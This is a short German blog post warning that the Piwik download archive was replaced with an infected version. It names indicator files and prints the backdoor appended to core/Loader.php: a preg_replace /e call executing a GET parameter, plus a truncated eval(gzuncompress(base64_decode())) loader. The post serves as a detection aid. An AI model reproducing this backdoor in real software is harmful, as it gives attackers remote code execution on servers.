Wie im Piwik Forum zu lesen ist (Link), ist eine infizierte Version von Piwik im Umlauf. Die latest.zip auf dem Piwik Download Server wurde gegen eine infizierte Version ausgetauscht.
Erkennbar ist dies, wenn sich die Datei „piwik/core/DataTable/Filter/Megre.php“ auf dem Server befindet und die letzten Zeilen von „piwik/core/Loader.php“ in etwa so aussehen:
Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');
exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode(.....
Leider wurde bisher offiziell nicht gewarnt, also zum Beispiel im Blog, der auch per RSS erreichbar ist.
Auch interessant:
- WordPress und Docker: Die perfekte Entwicklungsumgebung Docker ist ziemlich genial. Und wer für WordPress-Themes oder Plug-ins entwickelt, der wird die Vorteile der Nutzung von Docker sehr schnell merken. Hier zeige ich dir, wie du das schnell…
- Auf dem Mac mehrere PHP Versionen installieren Obwohl ich oft Docker benutze, benötige ich direkt auf dem Mac gelegentlich unterschiedliche PHP Versionen. Meistens um schnell mit composer install ein Projekt zu initialisieren, welches nicht auf der neuesten…
- Warum man in Blade lieber @if(! $user->isAdmin)… In Laravel Blade, der Templating-Engine des Frameworks, haben Entwickler verschiedene Möglichkeiten, Bedingungen in Templates zu implementieren. Ein häufiges Thema bei der Arbeit mit Bedingungslogik ist die Wahl zwischen den beiden…
- Die wichtigsten Neuerungen in PHP 8.4: Was… PHP 8.4, das am 21. November 2024 erscheint, bringt eine Reihe von bedeutenden Neuerungen und Optimierungen für Entwickler mit. Mit Verbesserungen wie den Property Hooks, erweiterten Möglichkeiten für HTML5-Verarbeitung und…
- PHP Modul ctype: Überprüfen von Zeichenketten mit… Das PHP Modul ctype bietet dir Funktionen, die es ermöglichen, den Typ von Zeichen in einer Zeichenkette zu überprüfen. Du kannst zum Beispiel überprüfen, ob alle Zeichen in einer Zeichenkette Buchstaben, Ziffern,…